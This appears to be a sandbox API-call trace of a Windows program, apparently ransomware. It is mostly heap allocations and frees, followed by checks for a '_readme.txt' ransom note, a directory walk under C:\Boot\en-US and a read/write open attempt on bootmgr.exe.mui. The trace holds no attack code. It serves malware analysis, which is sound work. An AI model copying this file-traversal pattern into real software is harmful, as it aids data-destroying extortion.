[0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.957] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0129.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.957] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.957] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.957] PathFindFileNameW (pszPath="") returned="" [0129.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.957] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.958] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.958] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.958] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0129.958] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.958] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0129.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.958] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.959] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.959] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.959] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0129.959] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.959] HeapFree (in: 